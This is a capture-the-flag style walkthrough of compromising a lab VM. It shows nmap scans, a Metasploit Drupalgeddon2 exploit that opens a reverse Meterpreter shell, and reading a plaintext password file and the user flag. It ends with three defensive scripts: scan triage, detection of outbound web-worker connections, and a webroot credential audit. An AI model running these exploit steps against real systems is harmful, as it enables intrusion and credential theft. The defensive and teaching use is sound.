# Hacking the virtual machine

## sudo nmap -F 192.168.43.0/24

You can also use `arp-scan -l`, but that gives no ports; or `sudo nmap -sP 192.168.43.0/24` (ping scan).

```
Nmap scan report for 192.168.43.76
Host is up (0.00091s latency).
Not shown: 96 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp
8081/tcp open  blackice-icecap
```

## sudo nmap -p1-65535 -sV -sC 192.168.43.76

```
Nmap scan report for 192.168.43.76
Host is up (0.00010s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8c:9f:7e:78:82:ef:76:f6:26:23:c9:52:6d:aa:fe:d0 (RSA)
|   256 2a:e2:f6:d2:52:1c:c1:d0:3d:aa:40:e6:b5:08:1d:45 (ECDSA)
|_  256 fa:c9:eb:58:e3:d2:b7:4a:74:77:fc:69:0e:b6:68:08 (ED25519)
80/tcp   open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: W3.CSS Template
5000/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-generator: WordPress 5.7.2
|_http-title: fsociety – Just another WordPress site
8081/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
9001/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: fsociety.web
```

## Look up vulnerabilities for SSH, Nginx and Drupal 7 on https://www.exploit-db.com/

![](https://i.imgur.com/tfTsoux.png)

## Go into Metasploit: search drupal 7

![](https://i.imgur.com/Qpt3byf.png)

A description of the vulnerability: https://xakep.ru/2018/04/17/drupalgeddon-2/

```
msf6 > use 1
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > options
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.43.76
rhosts => 192.168.43.76
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 9001
rport => 9001
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lport 1234
lport => 1234
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.43.220:1234
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 192.168.43.76
[*] Meterpreter session 1 opened (192.168.43.220:1234 -> 192.168.43.76:33628) at 2022-03-07 17:18:22 +0700
meterpreter > ls
meterpreter > cd misc
meterpreter > cat tyrell.pass
Username: tyrell
Password: mR_R0bo7_i5_R3@!_
meterpreter > pwd
/var/www/html/drupal/misc
meterpreter > cd /
meterpreter > ls
meterpreter > cd home
meterpreter > ls
Listing: /home

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2021-08-05 17:33:30 +0700  elliot
40755/rwxr-xr-x  4096  dir   2021-06-01 11:29:12 +0700  ghost
40755/rwxr-xr-x  4096  dir   2021-08-05 17:33:51 +0700  tyrell
meterpreter > cd tyrell
meterpreter > ls
Listing: /home/tyrell

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  505   fil   2021-08-05 17:38:31 +0700  .bash_history
40700/rwx------   4096  dir   2021-05-31 17:51:09 +0700  .cache
40700/rwx------   4096  dir   2021-05-31 17:51:08 +0700  .gnupg
100600/rw-------  36    fil   2021-08-05 17:33:51 +0700  .lesshst
100644/rw-r--r--  0     fil   2021-05-31 17:54:01 +0700  .sudo_as_admin_successful
100600/rw-------  2540  fil   2021-08-05 17:33:30 +0700  .viminfo
100664/rw-rw-r--  35    fil   2021-08-05 17:25:05 +0700  tyrell.txt
meterpreter > cat tyrell.txt
HackerU{Y0u_v3_g0T_Th3_U53rs_FLaG}
```
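The full service scan above is where the whole chain starts: four CMS/web ports, each disclosing its generator and server version. The following script is an added example, not part of the write-up, that parses `nmap -sV -sC` text into an inventory and builds the review worklist a defender (or the scan's owner) would want before anyone opens Metasploit. The embedded scan text is copied from the write-up's own output above (robots.txt entries trimmed, en-dash in a title replaced) so the script runs offline; the finding labels are this example's own wording.

```python
"""Parse `nmap -sV -sC` text into a service inventory and list what to review
first. The scan text below is the write-up's own output, trimmed, so this runs
offline."""
import re

NMAP_OUTPUT = """\
Nmap scan report for 192.168.43.76
Host is up (0.00010s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8c:9f:7e:78:82:ef:76:f6:26:23:c9:52:6d:aa:fe:d0 (RSA)
80/tcp   open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: W3.CSS Template
5000/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-generator: WordPress 5.7.2
|_http-title: fsociety - Just another WordPress site
8081/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
| http-robots.txt: 15 disallowed entries
9001/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: fsociety.web
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*(http-[\w.-]+):\s*(.*)$")   # NSE http-* result lines
CMS_RE = re.compile(r"^(WordPress|Joomla!|Drupal)\s*([\d.]*)")


def parse_nmap(text):
    """Return one dict per port line, with the NSE http-* results that follow it."""
    host, current, services = None, None, []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            current = {"host": host, "port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "scripts": {}}
            services.append(current)
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            current["scripts"][m.group(1)] = m.group(2).strip()
    return services


def triage(services):
    """Build the worklist: exposed CMS installs (with the version if the generator
    tag discloses it) and services that disclose a version string. Whether a
    version is actually vulnerable is decided against vendor advisories, not here."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        m = CMS_RE.match(s["scripts"].get("http-generator", ""))
        if m:
            ver = m.group(2) or "(version not disclosed)"
            findings.append((s["port"], f"{m.group(1)} {ver}",
                             "CMS exposed; review patch level and admin exposure"))
        hdr = s["scripts"].get("http-server-header", "")
        if re.search(r"\d+\.\d+", hdr):
            findings.append((s["port"], hdr, "web server version disclosed in header"))
        if s["service"] == "ssh" and s["version"]:
            findings.append((s["port"], s["version"],
                             "SSH version disclosed; confirm patch level and key-only auth"))
    return sorted(findings)


if __name__ == "__main__":
    for port, what, why in triage(parse_nmap(NMAP_OUTPUT)):
        print(f"{port:>5}  {what:<50}  {why}")
```

On the write-up's scan this yields eight items, with the Drupal 7 instance on 9001 standing out because the generator tag names the major version outright; the same parser works on any `-sV -sC` run, since it keys on the port line and the `|_http-*` script lines rather than on this host's values.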
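Seen from the target host, the Meterpreter session above is a PHP worker on 192.168.43.76 (source port 33628) holding an outbound TCP connection to the handler at 192.168.43.220:1234. That shape, a web-server worker process that initiated a connection rather than accepted one, is what to alert on, whatever exploit produced it. The script below is an added example, not from the write-up, that applies that rule to a socket table. The table is constructed in the shape of `ss -tnp` output, not captured from the VM, and the process names are assumptions.

```python
"""Flag web-server worker processes that hold outbound TCP connections.
The socket table is constructed in the shape of `ss -tnp` output; process
names and PIDs are assumptions, not values captured from the VM."""
import re
from ipaddress import ip_address, ip_network

SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port    Process
ESTAB  0      0      192.168.43.76:80     192.168.43.220:51522 users:(("nginx",pid=812,fd=7))
ESTAB  0      0      192.168.43.76:33628  192.168.43.220:1234  users:(("php-fpm7.2",pid=1401,fd=5))
ESTAB  0      0      192.168.43.76:22     192.168.43.10:40210  users:(("sshd",pid=905,fd=4))
ESTAB  0      0      127.0.0.1:9000       127.0.0.1:45120      users:(("php-fpm7.2",pid=1401,fd=6))
"""

# Processes that serve the sites, and the ports they listen on (the four web
# ports from the scan above plus 443). A connection whose *local* port is a
# listening port is an inbound client; any other connection held by one of
# these processes was opened by the worker itself, which a CMS rarely needs
# to do towards an arbitrary LAN host and which deserves a look.
WEB_WORKERS = {"nginx", "php-fpm", "apache2", "httpd"}
LISTEN_PORTS = {80, 443, 5000, 8081, 9001}

SS_RE = re.compile(
    r'^ESTAB\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+users:\(\("([^"]+)",pid=(\d+)')


def outbound_from_web_workers(ss_text, ignore_nets=("127.0.0.0/8", "::1/128")):
    """Return connections a web worker initiated to a peer outside ignore_nets."""
    nets = [ip_network(n) for n in ignore_nets]
    hits = []
    for line in ss_text.splitlines():
        m = SS_RE.match(line)
        if not m:
            continue
        laddr, lport, raddr, rport, proc, pid = m.groups()
        base = re.sub(r"[\d.]+$", "", proc)          # php-fpm7.2 -> php-fpm
        if base not in WEB_WORKERS or int(lport) in LISTEN_PORTS:
            continue
        peer_ip = ip_address(raddr.strip("[]"))      # ss prints IPv6 as [addr]
        if any(peer_ip in n for n in nets):          # loopback FastCGI and the like
            continue
        hits.append({"proc": proc, "pid": int(pid),
                     "local": f"{laddr}:{lport}", "peer": f"{raddr}:{rport}"})
    return hits


if __name__ == "__main__":
    for h in outbound_from_web_workers(SAMPLE_SS):
        print(f"ALERT {h['proc']}[{h['pid']}] {h['local']} -> {h['peer']}")
```

The loopback exclusion matters: nginx talks to php-fpm over a local socket, so without it every FastCGI connection would fire. On the sample table only the worker-to-1234 line survives the filters, which is the session the write-up opened.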
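The user flag was reachable only because a credential file, `/var/www/html/drupal/misc/tyrell.pass`, sat inside the document root where the web-server account could read it. The script below is an added example, not from the write-up, that audits a document root for exactly that: files whose name or content looks like stored credentials, and whether they are readable by other users. `build_sample_tree()` creates a constructed Drupal-like tree in a temporary directory that mirrors that layout, with a placeholder password rather than the one shown above.

```python
"""Audit a web document root for files that should never sit under it.
build_sample_tree() constructs a Drupal-like tree with one stray credential
file (placeholder content) so the audit can be run offline."""
import os
import re
import stat
import tempfile

# Names that usually mean "secret or backup, not a web asset".
SUSPECT_NAME = re.compile(
    r"(\.pass(wd)?$|\.bak$|\.old$|\.sql$|\.env$|\.key$|\.pem$|cred|passw)", re.I)
# A "key: value" or "key=value" line whose key names a login or password.
SUSPECT_CONTENT = re.compile(
    r"^\s*(username|user|login|password|passwd)\s*[:=]", re.I | re.M)


def scan_webroot(root, max_read=4096):
    """Walk root and return [(relative path, [reasons])] for suspicious files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if SUSPECT_NAME.search(name):
                reasons.append("name suggests credentials or backup")
            try:
                with open(path, "rb") as fh:          # only the head, large assets are cheap to skip
                    head = fh.read(max_read).decode("utf-8", "replace")
                if SUSPECT_CONTENT.search(head):
                    reasons.append("content looks like a credential pair")
            except OSError:
                reasons.append("unreadable")
            # Permission bit is only interesting once the file is suspicious.
            if reasons and os.stat(path).st_mode & stat.S_IROTH:
                reasons.append("world-readable")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, reasons))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample: a Drupal-like tree with one stray credential file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    misc = os.path.join(root, "drupal", "misc")
    os.makedirs(misc)
    with open(os.path.join(root, "drupal", "index.php"), "w") as fh:
        fh.write("<?php require 'includes/bootstrap.inc';\n")
    with open(os.path.join(misc, "drupal.js"), "w") as fh:
        fh.write("var Drupal = Drupal || {};\n")
    cred = os.path.join(misc, "tyrell.pass")
    with open(cred, "w") as fh:
        fh.write("Username: tyrell\nPassword: PLACEHOLDER-not-the-real-one\n")
    os.chmod(cred, 0o644)   # readable by the web-server user, as on the VM
    return root


if __name__ == "__main__":
    for rel, reasons in scan_webroot(build_sample_tree()):
        print(f"{rel}: {', '.join(reasons)}")
```

Run against a real document root (`scan_webroot("/var/www/html")`) the output is a list to act on: move the file out of the webroot, rotate whatever it held, and check the web server's access log for requests to that path. On the sample tree only `drupal/misc/tyrell.pass` is reported, with all three reasons.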